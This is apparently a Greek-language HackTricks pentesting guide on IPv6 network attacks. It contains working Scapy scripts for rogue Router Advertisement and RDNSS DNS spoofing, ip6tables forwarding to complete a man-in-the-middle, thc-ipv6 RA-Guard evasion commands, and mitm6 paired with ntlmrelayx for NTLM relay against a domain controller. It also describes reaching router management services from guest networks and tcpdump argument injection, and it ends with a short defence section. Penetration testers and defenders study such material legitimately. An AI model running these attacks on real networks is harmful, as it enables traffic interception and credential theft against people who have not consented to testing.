Pentesting IPv6

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

IPv6 Basic theory

Networks

Οι διευθύνσεις IPv6 είναι δομημένες για να βελτιώνουν την οργάνωση του δικτύου και την αλληλεπίδραση των συσκευών. Μια διεύθυνση IPv6 χωρίζεται σε:

  1. Πρόθεμα Δικτύου: Τα αρχικά 48 bits, που καθορίζουν το τμήμα δικτύου.
  2. Αναγνωριστικό υποδικτύου: Τα επόμενα 16 bits, που χρησιμοποιούνται για τον ορισμό συγκεκριμένων υποδικτύων μέσα στο δίκτυο.
  3. Αναγνωριστικό διεπαφής: Τα τελικά 64 bits, που προσδιορίζουν μοναδικά μια συσκευή εντός του υποδικτύου.

Ενώ το IPv6 παραλείπει το πρωτόκολλο ARP που υπάρχει στο IPv4, εισάγει το ICMPv6 με δύο βασικά μηνύματα:

  • Neighbor Solicitation (NS): Μηνύματα multicast για επίλυση διευθύνσεων.
  • Neighbor Advertisement (NA): Απαντήσεις unicast σε NS ή αυθόρμητες ανακοινώσεις.

Το IPv6 περιλαμβάνει επίσης ειδικούς τύπους διευθύνσεων:

  • Loopback Address (::1): Ισοδύναμη με το 127.0.0.1 του IPv4, για εσωτερική επικοινωνία εντός του συστήματος.
  • Link-Local Addresses (FE80::/10): Για δραστηριότητες τοπικού δικτύου, όχι για δρομολόγηση στο διαδίκτυο. Συσκευές στο ίδιο τοπικό δίκτυο μπορούν να ανακαλύψουν η μία την άλλη χρησιμοποιώντας αυτό το εύρος.

Practical Usage of IPv6 in Network Commands

Για να αλληλεπιδράσετε με δίκτυα IPv6, μπορείτε να χρησιμοποιήσετε διάφορες εντολές:

  • Ping διευθύνσεων Link-Local: Έλεγχος παρουσίας τοπικών συσκευών με χρήση ping6.
  • Neighbor Discovery: Χρησιμοποιήστε ip neigh για να δείτε συσκευές που ανακαλύφθηκαν στο επίπεδο σύνδεσης.
  • alive6: Ένα εναλλακτικό εργαλείο για την ανακάλυψη συσκευών στο ίδιο δίκτυο.

Παρακάτω υπάρχουν μερικά παραδείγματα εντολών:

ping6 –I eth0 -c 5 ff02::1 > /dev/null 2>&1
ip neigh | grep ^fe80

# Alternatively, use alive6 for neighbor discovery
alive6 eth0

IPv6 διευθύνσεις μπορούν να προκύψουν από τη MAC διεύθυνση μιας συσκευής για τοπική επικοινωνία. Ακολουθεί ένας απλοποιημένος οδηγός για το πώς να παράγετε τη Link-local IPv6 διεύθυνση από γνωστή MAC διεύθυνση, καθώς και μια σύντομη επισκόπηση των τύπων IPv6 διευθύνσεων και μεθόδων για την ανακάλυψη IPv6 διευθύνσεων εντός ενός δικτύου.

Given a MAC address 12:34:56:78:9a:bc, you can construct the Link-local IPv6 address as follows:

  1. Convert MAC to IPv6 format: 1234:5678:9abc
  2. Prepend fe80:: and insert fffe in the middle: fe80::1234:56ff:fe78:9abc
  3. Invert the seventh bit from the left, changing 1234 to 1034: fe80::1034:56ff:fe78:9abc

IPv6 Address Types

  • Unique Local Address (ULA): Για τοπικές επικοινωνίες, δεν προορίζεται για δρομολόγηση στο δημόσιο internet. Prefix: FEC00::/7
  • Multicast Address: Για one-to-many επικοινωνία. Παραδίδεται σε όλες τις διεπαφές στο multicast group. Prefix: FF00::/8
  • Anycast Address: Για one-to-nearest επικοινωνία. Αποστέλλεται στην πλησιέστερη διεπαφή σύμφωνα με το routing protocol. Μέρος της 2000::/3 global unicast περιοχής.

Address Prefixes

  • fe80::/10: Link-Local addresses (παρόμοιο με 169.254.x.x)
  • fc00::/7: Unique Local-Unicast (παρόμοιο με private IPv4 ranges όπως 10.x.x.x, 172.16.x.x, 192.168.x.x)
  • 2000::/3: Global Unicast
  • ff02::1: Multicast All Nodes
  • ff02::2: Multicast Router Nodes

Discovering IPv6 Addresses within a Network

  1. Obtain the MAC address of a device within the network.
  2. Derive the Link-local IPv6 address from the MAC address.

Way 2: Using Multicast

  1. Send a ping to the multicast address ff02::1 to discover IPv6 addresses on the local network.
service ufw stop # Stop the firewall
ping6 -I <IFACE> ff02::1 # Send a ping to multicast address
ip -6 neigh # Display the neighbor table

IPv6 Man-in-the-Middle (MitM) Attacks

Several techniques exist for executing MitM attacks in IPv6 networks, such as:

  • Spoofing ICMPv6 neighbor or router advertisements.
  • Using ICMPv6 redirect or “Packet Too Big” messages to manipulate routing.
  • Attacking mobile IPv6 (usually requires IPSec to be disabled).
  • Setting up a rogue DHCPv6 server.

Εντοπισμός IPv6 Addresses στο eild

Εξερεύνηση Subdomains

Μία μέθοδος για να βρείτε subdomains που ενδέχεται να συνδέονται με IPv6 addresses είναι η χρήση μηχανών αναζήτησης. Για παράδειγμα, η χρήση ενός προτύπου ερώτησης όπως ipv6.* μπορεί να είναι αποτελεσματική. Συγκεκριμένα, η ακόλουθη εντολή αναζήτησης μπορεί να χρησιμοποιηθεί στο Google:

site:ipv6./

Χρήση DNS ερωτημάτων

Για να εντοπίσετε διευθύνσεις IPv6, μπορούν να γίνουν ερωτήματα σε συγκεκριμένους τύπους εγγραφών DNS:

  • AXFR: Ζητά μια πλήρη μεταφορά ζώνης, ενδεχομένως αποκαλύπτοντας ένα ευρύ φάσμα εγγραφών DNS.
  • AAAA: Αναζητά άμεσα διευθύνσεις IPv6.
  • ANY: Ένα ευρύ ερώτημα που επιστρέφει όλες τις διαθέσιμες εγγραφές DNS.

Σάρωση με ping6

Μετά τον εντοπισμό διευθύνσεων IPv6 που σχετίζονται με έναν οργανισμό, το βοηθητικό πρόγραμμα ping6 μπορεί να χρησιμοποιηθεί για σάρωση. Αυτό το εργαλείο βοηθά στην αξιολόγηση της ανταπόκρισης των εντοπισμένων διευθύνσεων IPv6 και μπορεί επίσης να βοηθήσει στον εντοπισμό γειτονικών συσκευών IPv6.

IPv6 Τοπικές Τεχνικές Επίθεσης Δικτύου

Τα παρακάτω τμήματα καλύπτουν πρακτικές επιθέσεις IPv6 layer-2 που μπορούν να εκτελεστούν μέσα στο ίδιο /64 τμήμα χωρίς να γνωρίζετε κάποιο global prefix. Όλα τα πακέτα που εμφανίζονται παρακάτω είναι link-local και διακινούνται μόνο μέσω του τοπικού switch, καθιστώντας τα εξαιρετικά διακριτικά στα περισσότερα περιβάλλοντα.

Ρύθμιση συστήματος για σταθερό lab

Πριν πειραματιστείτε με την κίνηση IPv6, συνιστάται να σκληροποιήσετε το box σας ώστε να μην μολυνθεί από τις δικές σας δοκιμές και για να επιτύχετε την καλύτερη απόδοση κατά τη διάρκεια μαζικής έγχυσης/παρακολούθησης πακέτων.

# Enable promiscuous mode to capture all frames
sudo ip link set dev eth0 promisc on

# Ignore rogue Router Advertisements & Redirects coming from the segment
sudo sysctl -w net.ipv6.conf.all.accept_ra=0
sudo sysctl -w net.ipv6.conf.all.accept_redirects=0

# Increase fd / backlog limits when generating lots of traffic
sudo sysctl -w fs.file-max=100000
sudo sysctl -w net.core.somaxconn=65535
sudo sysctl -w net.ipv4.tcp_tw_reuse=1

Παθητικό NDP & DHCPv6 Sniffing

Επειδή κάθε IPv6 host εντάσσεται αυτόματα σε πολλαπλές multicast ομάδες (ff02::1, ff02::2, …) και μιλάει ICMPv6 για SLAAC/NDP, μπορείτε να χαρτογραφήσετε ολόκληρο το τμήμα δικτύου χωρίς να στείλετε ούτε ένα πακέτο. Ο παρακάτω Python/Scapy one-liner ακούει για τα πιο ενδιαφέροντα L2 μηνύματα και τυπώνει μια χρωματιστή, με χρονοσήμανση καταγραφή του ποιος είναι ποιος:

#!/usr/bin/env python3
from scapy.all import *
from scapy.layers.dhcp6 import *
from datetime import datetime
from colorama import Fore, Style, init
import argparse

init(autoreset=True)

# Human-readable names for protocols we care about
DHCP6_TYPES = {
DHCP6_Solicit:    'Solicit',
DHCP6_Advertise:  'Advertise',
DHCP6_Request:    'Request',
DHCP6_Reply:      'Reply',
DHCP6_Renew:      'Renew',
DHCP6_Rebind:     'Rebind',
DHCP6_RelayForward:'Relay-Forward',
DHCP6_RelayReply: 'Relay-Reply'
}
ICMP6_TYPES = {
ICMPv6ND_RS:      ('Router Solicitation',  Fore.CYAN),
ICMPv6ND_RA:      ('Router Advertisement', Fore.GREEN),
ICMPv6ND_NS:      ('Neighbor Solicitation',Fore.BLUE),
ICMPv6ND_NA:      ('Neighbor Advertisement',Fore.MAGENTA),
ICMPv6ND_Redirect:('Redirect',             Fore.LIGHTRED_EX),
ICMPv6MLReport:   ('MLD Report',           Fore.LIGHTCYAN_EX),
ICMPv6MLReport2:  ('MLD Report',           Fore.LIGHTCYAN_EX),
ICMPv6MLDone:     ('MLD Done',             Fore.LIGHTCYAN_EX),
ICMPv6EchoRequest:('Echo Request',         Fore.LIGHTBLACK_EX),
ICMPv6EchoReply:  ('Echo Reply',           Fore.LIGHTBLACK_EX)
}

def handler(pkt):
eth_src = pkt[Ether].src if Ether in pkt else '?'
eth_dst = pkt[Ether].dst if Ether in pkt else '?'
ip6_src = pkt[IPv6].src if IPv6 in pkt else '?'
ip6_dst = pkt[IPv6].dst if IPv6 in pkt else '?'

# Identify protocol family first
for proto,(desc,color) in ICMP6_TYPES.items():
if proto in pkt:
break
else:
if UDP in pkt and pkt[UDP].dport == 547:  # DHCPv6 server port
for dhcp_t,name in DHCP6_TYPES.items():
if dhcp_t in pkt:
desc = 'DHCPv6 – '+name; color = Fore.YELLOW; break
else:
return  # not a DHCPv6 message we track
else:
return  # not interesting

print(color + f"[{datetime.now().strftime('%H:%M:%S')}] {desc}")
print(f"  MAC  {eth_src} -> {eth_dst}")
print(f"  IPv6 {ip6_src} -> {ip6_dst}")
print('-'*60)

if __name__ == '__main__':
argp = argparse.ArgumentParser(description='IPv6 NDP & DHCPv6 sniffer')
argp.add_argument('-i','--interface',required=True,help='Interface to sniff')
argp.add_argument('-t','--time',type=int,default=0,help='Duration (0 = infinite)')
a = argp.parse_args()
sniff(iface=a.interface,prn=handler,timeout=a.time or None,store=0)

Αποτέλεσμα: μια πλήρης link-local topology (MAC ⇄ IPv6) μέσα σε λίγα δευτερόλεπτα, χωρίς να ενεργοποιούνται συστήματα IPS/IDS που βασίζονται σε active scans.

Router Advertisement (RA) Spoofing

Οι IPv6 hosts βασίζονται στα ICMPv6 Router Advertisements για την ανακάλυψη του default-gateway. Αν εγχύσετε πλαστά RAs πιο συχνά από τον νόμιμο router, οι συσκευές θα μεταβούν σιωπηλά σε εσάς ως το gateway.

#!/usr/bin/env python3
from scapy.all import *
import argparse

p = argparse.ArgumentParser()
p.add_argument('-i','--interface',required=True)
p.add_argument('-m','--mac',required=True,help='Source MAC (will be put in SrcLL option)')
p.add_argument('--llip',required=True,help='Link-local source IP, e.g. fe80::dead:beef')
p.add_argument('-l','--lifetime',type=int,default=1800,help='Router lifetime')
p.add_argument('--interval',type=int,default=5,help='Seconds between RAs')
p.add_argument('--revert',action='store_true',help='Send lifetime=0 to undo attack')
args = p.parse_args()

lifetime = 0 if args.revert else args.lifetime
ra = (IPv6(src=args.llip,dst='ff02::1',hlim=255)/
ICMPv6ND_RA(routerlifetime=lifetime, prf=0x1)/  # High preference
ICMPv6NDOptSrcLLAddr(lladdr=args.mac))

send(ra,iface=args.interface,loop=1,inter=args.interval)

Για να πραγματικά προωθήσετε την κυκλοφορία μετά τη νίκη στο race:

sudo sysctl -w net.ipv6.conf.all.forwarding=1
sudo ip6tables -A FORWARD -i eth0 -j ACCEPT
sudo ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Σημαίες Router Advertisement (M/O) & Προεπιλεγμένη Προτίμηση Router (Prf)

FlagMeaningEffect on Client Behaviour
M (Managed Address Configuration)Υποδεικνύει ότι η ανάθεση διευθύνσεων (stateful) μέσω DHCPv6 είναι διαθέσιμη στο τμήμα.Ισχυρή ένδειξη ότι DHCPv6 spoofing μπορεί να λειτουργήσει.
O (Other Configuration)Υποδεικνύει ότι οι hosts πρέπει να χρησιμοποιούν DHCPv6 για άλλες παραμέτρους (DNS, NTP, …).Η διεύθυνση συνήθως εξακολουθεί να προέρχεται από SLAAC, αλλά το DNS μπορεί να υποκλαπεί με DHCPv6.
M=0 / O=0Καθαρό δίκτυο τύπου SLAAC.Το DHCPv6 ενδέχεται να μην εμφανιστεί ποτέ· επικεντρωθείτε σε rogue RA / RDNSS αντί για mitm6.
M=1 / O=1Μικτό περιβάλλον.Μπορεί να συνυπάρχουν πληροφορίες DHCPv6 και SLAAC· η επιφάνεια spoofing είναι η μεγαλύτερη.

Κατά τη διάρκεια ενός pentest μπορείτε απλά να επιθεωρήσετε το νόμιμο RA μία φορά και να αποφασίσετε ποιος vector είναι εφικτός:

sudo tcpdump -vvv -i eth0 'icmp6 && ip6[40] == 134'   # capture Router Advertisements

Αναζητήστε το πεδίο flags [M,O] στο dump – δεν χρειάζεται εικασία.

Το Prf (Router Preference) πεδίο μέσα στην κεφαλίδα RA ελέγχει πόσο ελκυστικός φαίνεται ο κακόβουλος δρομολογητής σας όταν υπάρχουν πολλαπλές πύλες:

Prf valueBinaryMeaning
Υψηλή10Οι clients προτιμούν αυτόν τον δρομολογητή έναντι οποιουδήποτε Μεσαίου/Χαμηλού
Μεσαία (προεπιλογή)01Χρησιμοποιείται από σχεδόν κάθε νόμιμη συσκευή
Χαμηλή00Επιλέγεται μόνο όταν δεν υπάρχει καλύτερος δρομολογητής

When generating the packet with Scapy you can set it through the prf parameter as shown above (prf=0x1 → Υψηλή). Συνδυάζοντας Υψηλή Prf, ένα σύντομο διάστημα, και μια μη μηδενική διάρκεια ζωής κάνει την κακόβουλη πύλη σας εξαιρετικά σταθερή.

RDNSS (DNS) Spoofing μέσω RA

RFC 8106 επιτρέπει την προσθήκη μιας επιλογής Recursive DNS Server (RDNSS) μέσα σε μια RA. Αυτό είναι το go-to DNS hijack primitive όταν το segment είναι SLAAC-only (M=0 / O=0) και οι clients δεν μιλούν με DHCPv6. Η υποστήριξη από τους clients εξαρτάται από την υλοποίηση, οπότε επικυρώστε το λειτουργικό σύστημα-στόχο στο εργαστήριο αντί να υποθέσετε ότι όλοι οι clients θα χρησιμοποιούν το RDNSS.

#!/usr/bin/env python3
from scapy.all import *
import argparse

p = argparse.ArgumentParser()
P = p.add_argument
P('-i','--interface',required=True)
P('--llip',required=True)
P('--dns',required=True,help='Fake DNS IPv6')
P('--lifetime',type=int,default=600)
P('--interval',type=int,default=5)
args = p.parse_args()

ra = (IPv6(src=args.llip,dst='ff02::1',hlim=255)/
ICMPv6ND_RA(routerlifetime=0)/
ICMPv6NDOptRDNSS(dns=[args.dns],lifetime=args.lifetime))

send(ra,iface=args.interface,loop=1,inter=args.interval)

Το ίδιο πακέτο μπορεί επίσης να φέρει μια επιλογή DNSSL για να δηλητηριάσει τις διαδρομές επίλυσης σύντομων ονομάτων σε περιβάλλοντα IPv6-only ή dual-stack όπου τα πεδία αναζήτησης έχουν σημασία. Αν τερματίσετε την επίθεση καθαρά, στείλτε ένα revert RA με την ίδια επιλογή και lifetime=0.

RA-Guard Παράκαμψη στην Πράξη

RFC 7113 τεκμηριώνει γιατί οι απλοϊκές υλοποιήσεις RA-Guard μπορούν να παρακαμφθούν όταν αποτυγχάνουν να αναλύσουν την πλήρη αλυσίδα επικεφαλίδων IPv6 ή όταν, σε περίπτωση fragments, αφήνουν το φίλτρο ανοιχτό. Αυτό δεν είναι νέα έρευνα, αλλά παραμένει λειτουργικά σημαντικό επειδή πολλοί διακόπτες πρόσβασης υλοποιούν μόνο μερικό φιλτράρισμα.

Πρόσφατες εκδόσεις του thc-ipv6 αποκαλύπτουν αυτό άμεσα στα εργαλεία:

# Hop-by-Hop header before the RA
sudo atk6-fake_router6 -H eth0 2001:db8:1337::/64

# Fragmentation / destination-options variants against weak RA-Guard
sudo atk6-fake_router6 -F eth0 2001:db8:1337::/64
sudo atk6-fake_router6 -D eth0 2001:db8:1337::/64

# Flooded variant with full RA-Guard evasion and DHCPv6 flags set
sudo atk6-flood_router26 -F -m eth0

Χρησιμοποιήστε αυτά μόνο αφού επιβεβαιώσετε ότι ένα συνηθισμένο πλαστό RA φιλτράρεται. Αν τα -H/-D/-F ξαφνικά κάνουν hosts να αποδέχονται τον rogue router σας, έχετε απόδειξη ότι ο switch ταιριάζει μόνο το σταθερό IPv6 header αντί για το πραγματικό ICMPv6 RA payload.

DHCPv6 DNS Spoofing (mitm6)

Όταν το νόμιμο RA ανακοινώνει τις σημαίες M και/ή O, οι Windows πελάτες συνήθως στέλνουν αιτήματα DHCPv6 για διεύθυνση ή βοηθητική διαμόρφωση. mitm6 εκμεταλλεύεται αυτή τη συμπεριφορά απαντώντας στο DHCPv6 και εισάγοντας το link-local IPv6 σας ως DNS με σύντομη διάρκεια μίσθωσης. Αυτό επιτρέπει:

  • NTLM relay attacks (WPAD + DNS hijacking)
  • Υποκλοπή της εσωτερικής επίλυσης ονομάτων χωρίς επέμβαση στους routers
  • Χαμηλού θορύβου στοχοποίηση επειδή μπορείτε να περιορίσετε το poisoning σε συγκεκριμένα hosts ή domains

Τυπική χρήση:

# DNS takeover without sending rogue RAs
sudo mitm6 -i eth0 --no-ra -d corp.local --host-allowlist wsus

# Pair it with IPv6-capable relay listeners
sudo ntlmrelayx.py -6 -t ldaps://dc.corp.local -wh wpad

Χρήσιμες λεπτομέρειες από τις τρέχουσες εκδόσεις του mitm6:

  • --no-ra κρατά την επίθεση μόνο DHCPv6 όταν το δίκτυο εντοπίζει rogue RAs.
  • -d/--domain και --host-allowlist περιορίζουν το poisoning αντί να κάνουν hijacking κάθε ερώτημα στο segment.
  • --ignore-nofqdn μειώνει τον θόρυβο από clients που παραλείπουν την επιλογή DHCPv6 FQDN.

If the segment is pure SLAAC (M=0 / O=0), mitm6 is usually the wrong primitive. Use rogue RAs / RDNSS instead, and keep the higher-level relay logic in the WPAD/relay page.

Μέτρα άμυνας

  • RA Guard / DHCPv6 Guard / ND Inspection σε managed switches.
  • Port ACLs που επιτρέπουν μόνο τη MAC διεύθυνση του νόμιμου router να στέλνει RAs.
  • Παρακολούθηση για μη αναμενόμενες RAs υψηλού ρυθμού ή ξαφνικές αλλαγές RDNSS.
  • Η απενεργοποίηση του IPv6 στους endpoints είναι μια προσωρινή λύση που συχνά διαταράσσει τις σύγχρονες υπηρεσίες και κρύβει blind spots – προτιμήστε L2 filtering.

Ανακάλυψη δρομολογητή μέσω NDP σε guest/public SSIDs και έκθεση υπηρεσιών διαχείρισης

Πολλοί consumer routers εκθέτουν management daemons (HTTP(S), SSH/Telnet, TR-069, κ.λπ.) σε όλες τις διεπαφές. Σε ορισμένες εγκαταστάσεις, το SSID “guest/public” είναι γεφυρωμένο στο WAN/core και είναι IPv6-only. Ακόμα κι αν το IPv6 του δρομολογητή αλλάζει σε κάθε εκκίνηση, μπορείτε αξιόπιστα να το μάθετε χρησιμοποιώντας NDP/ICMPv6 και στη συνέχεια να συνδεθείτε απευθείας στο management plane από το guest SSID.

Τυπική ροή εργασίας από έναν client συνδεδεμένο στο guest/public SSID:

  1. Ανακαλύψτε τον δρομολογητή μέσω ICMPv6 Router Solicitation προς το All-Routers multicast ff02::2 και καταγράψτε το Router Advertisement (RA):
# Listen for Router Advertisements (ICMPv6 type 134)
sudo tcpdump -vvv -i <IFACE> 'icmp6 and ip6[40]==134'

# Provoke an RA by sending a Router Solicitation to ff02::2
python3 - <<'PY'
from scapy.all import *
send(IPv6(dst='ff02::2')/ICMPv6ND_RS(), iface='<IFACE>')
PY

Το RA αποκαλύπτει τη link-local διεύθυνση του router και συχνά μια global address/prefix. Εάν είναι γνωστή μόνο μια link-local, θυμηθείτε ότι οι συνδέσεις πρέπει να καθορίζουν τον δείκτη ζώνης (zone index), π.χ. ssh -6 admin@[fe80::1%wlan0].

Εναλλακτικά: χρησιμοποιήστε το ndisc6 suite αν είναι διαθέσιμο:

# rdisc6 sends RS and prints RAs in a friendly way
rdisc6 <IFACE>
  1. Πρόσβαση σε εκτεθειμένες υπηρεσίες μέσω IPv6 από το guest SSID:
# SSH/Telnet example (replace with discovered address)
ssh -6 admin@[2001:db8:abcd::1]
# Web UI over IPv6
curl -g -6 -k 'http://[2001:db8:abcd::1]/'
# Fast IPv6 service sweep
nmap -6 -sS -Pn -p 22,23,80,443,7547 [2001:db8:abcd::1]
  1. Εάν το management shell παρέχει εργαλεία packet-capture μέσω ενός wrapper (π.χ., tcpdump), ελέγξτε για argument/filename injection που επιτρέπει τη διέλευση επιπλέον flags του tcpdump όπως -G/-W/-z για εκτέλεση εντολών μετά την περιστροφή. Δείτε:

Wildcards Spare tricks

Μέτρα/σημειώσεις:

  • Μην δεσμεύετε το management σε guest/public bridges· εφαρμόστε IPv6 firewalls σε SSID bridges.
  • Περιορίστε ρυθμό και φιλτράρετε NDP/RS/RA σε guest segments όπου είναι εφικτό.
  • Για υπηρεσίες που πρέπει να είναι προσβάσιμες, επιβάλετε authN/MFA και ισχυρούς περιορισμούς ρυθμού.

Αναφορές

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks